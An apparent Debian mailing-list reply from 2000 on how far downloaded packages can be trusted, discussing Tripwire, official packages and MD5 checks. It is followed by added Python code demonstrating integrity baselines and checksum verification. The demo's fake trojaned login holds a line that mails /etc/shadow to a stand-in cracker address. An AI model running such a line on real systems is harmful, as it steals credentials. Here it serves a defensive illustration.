-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 22 Aug 2000, hogan wrote:

> I go to this site, download the .deb's .. How can I be sure they're not
> malicious.

You can't. Period. Same goes for source. Same goes for commercial binaries. Same goes for any code you haven't read (or had someone you thoroughly trust read).

To illustrate this point, there's a perl module somewhere (don't remember the module or what it does... something to do with Apache/web anyway) that, when you run 'perl Makefile.PL', runs through some stuff and then spits out something about preparing to do 'rm -rf /'. Naturally it doesn't actually do it, but it follows with a message about the importance of confirming the trustworthiness of *any* code you install on your system.

> Or maybe for those who develop homicidal tendencies when asked, "Are you
> sure?" :) :) a log of what the program did? (Now I know very little 'bout
> Linux - I'm still learning.. Would a journalling FS such as ReiserFS help in
> this regard?) Is something like tripwire (that I've read a few little
> bits'n'pieces about) what I need to give me a little reassurance that I'm not
> completely placing my machine into the hands of a stranger?

Tripwire will give you an idea of what files change, so you can be sure that (for example) installing a mail reader is not replacing /bin/login or something like that. That doesn't prevent that same mail reader from mailing off some crucial piece of data or some security info to some cracker database somewhere, though.

> I mean I generally get the feeling people around this and other linux related
> mailing lists that people really want to help, but I can't help but think that
> all of this is placing a lot of trust in people one will never meet and may
> indeed never communicate with.

In the case of official Debian packages (downloaded from the 'main' section of an official Debian mirror; non-free and contrib may not apply, but then they might... I don't know) you can be reasonably sure that what you see is what you get. Debian has a pretty strict policy regarding becoming an official developer. You're pretty much certain that the package is in fact built from the code it is claimed to have been built from and that the maintainer is who they claim to be.

In the case of unofficial packages like the Pine packages on my mirror, you can check Washington University's FTP site for some MD5 checksums or whatever for their code, then read through the diff (much less code than reading all of Pine!) and build your own package from this source to confirm for yourself that Pine is safe. Of course, that's assuming you trust UW.

In short, there are no guarantees. At some point you have to take it on faith that somebody honest has read the code that you're installing.

Noah

_______________________________________________________
| Web: http://web.morgul.net/~frodo/
| PGP Public Key: http://web.morgul.net/~frodo/mail.html

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBOaF+RodCcpBjGWoFAQH6BQQAtkRaJyorHigOAkmW9cdE8Po6s48FRgrF
Uo+GXSpjeCc3EvIn08cP3VWe1WGa1IqDfofnuCZnOu2V2kODUAJimx+DN3sZkK/+
tErtiZjCsup4mUMeCPRkr65KOOQ6EwGuacJombo9rxdsakR8HM6P5Gzzo17gRAvz
vFV9OwhjsvM=
=IsaP
-----END PGP SIGNATURE-----
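The two checks Noah mentions, a Tripwire-style "what files changed" comparison and verifying downloaded source against a published checksum list, as an added example in Python. This is illustration code, not part of Noah's message, not Tripwire, and not any Debian tool. The fake root tree, the "trojaned login" package, the tarball and the checksum list are all constructed inside a temporary directory so the script runs offline; the file names and the example.invalid address are assumptions of the demo.

```python
"""Added illustration: Tripwire-style baseline/compare of a directory tree,
plus verification of an md5sum-format checksum list. Example code only."""
import hashlib
import hmac
import stat
import tempfile
from pathlib import Path


def file_digest(path, algo="sha256"):
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Record (permission bits, size, digest) for every regular file under root,
    keyed by POSIX-style relative path. Symlinks are skipped so a link that
    points outside the tree is never followed."""
    root = Path(root)
    db = {}
    for p in sorted(root.rglob("*")):
        if p.is_symlink() or not p.is_file():
            continue
        st = p.stat()
        db[p.relative_to(root).as_posix()] = (stat.S_IMODE(st.st_mode), st.st_size, file_digest(p))
    return db


def compare(baseline, current):
    """Diff two snapshots: files added, removed, or whose mode/size/digest changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k])
    return {"added": added, "removed": removed, "changed": changed}


def verify_checksums(checksum_text, directory, algo="md5"):
    """Parse 'digest  filename' lines (md5sum/sha256sum output) and check each
    file inside directory. Returns {filename: bool}; a missing file, or a name
    that escapes the directory, is reported as False rather than raising."""
    base = Path(directory).resolve()
    results = {}
    for line in checksum_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        expected, _, name = line.partition("  ")
        name = name.lstrip("*")  # md5sum's binary-mode marker
        path = (base / name).resolve()
        if base not in path.parents or not path.is_file():
            results[name] = False
            continue
        actual = file_digest(path, algo).encode()
        results[name] = hmac.compare_digest(actual, expected.lower().encode())
    return results


def demo():
    """Constructed scenario: baseline a fake root, then 'install' a package that
    replaces bin/login and adds usr/bin/pine; separately verify a checksum list."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "login").write_bytes(b'#!/bin/sh\nexec /sbin/real-login "$@"\n')
        (root / "etc").mkdir()
        (root / "etc" / "passwd").write_bytes(b"root:x:0:0:root:/root:/bin/sh\n")
        before = snapshot(root)

        # The untrusted package: swaps in a login that leaks /etc/shadow, adds a binary.
        (root / "bin" / "login").write_bytes(b"#!/bin/sh\ncat /etc/shadow | mail cracker@example.invalid\n")
        (root / "usr" / "bin").mkdir(parents=True)
        (root / "usr" / "bin" / "pine").write_bytes(b"\x7fELF constructed placeholder")
        after = snapshot(root)
        integrity = compare(before, after)

        # Checksum list such as a vendor FTP site might publish (constructed here).
        tarball = root / "pine.tar.gz"
        tarball.write_bytes(b"constructed stand-in for a source tarball")
        sums = f"{file_digest(tarball, 'md5')}  pine.tar.gz\n{'0' * 32}  missing.tar.gz\n"
        checks = verify_checksums(sums, root, "md5")
        return integrity, checks


if __name__ == "__main__":
    integrity, checks = demo()
    print("integrity:", integrity)
    print("checksums:", checks)
```

The baseline catches the replaced bin/login and the new usr/bin/pine, which is exactly the reassurance Noah describes; it says nothing about what the new login does when it runs, which is his caveat. The checksum list also only tells you that the bytes match what the publisher hashed: an MD5 fetched from the same site as the tarball detects corruption, not a substituted site, so the digest (or a signature over it) should come from a source you trust independently, as with Noah's "that's assuming you trust UW". MD5 is used here only because it is what the message refers to; a practitioner today would prefer SHA-256 or a signed release file.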